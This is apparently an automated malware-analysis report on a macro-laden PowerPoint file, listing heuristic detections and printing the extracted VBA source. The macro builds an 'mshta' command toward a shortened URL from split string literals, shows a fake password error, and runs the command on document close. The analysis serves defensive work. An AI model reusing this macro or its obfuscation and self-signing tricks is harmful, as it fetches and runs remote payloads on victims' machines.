MALICIOUS
150
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell _ -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Shell _ -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Auto_close() -
VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNEDThe VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas🔏 Self-signedVBA project digital signature |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 881 bytes |
SHA-256: 026fbefabaffbda0dd803cbde17368df9917f9444c82205fae4d416985f3bd6b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dotcom1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/llsoaskokcdokoktewelvw"
End Property
Attribute VB_Name = "Moon"
Dim mode As New dotcom1
Function p()
p = mode.computer + mode.computer2 + mode.computer3
End Function
Sub _
Auto_close()
: InputBox "Password!": MsgBox "ERROR! Password Incorrect!"
Call _
Shell _
(p)
End Sub
|
|||
vbaProject_00.bin🔏 Self-signedVBA project digital signature |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 18944 bytes |
SHA-256: 8ffe9e76f46b6c1795fcee076be87d6f45569d5cd8882d199521cd190d27bf52 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.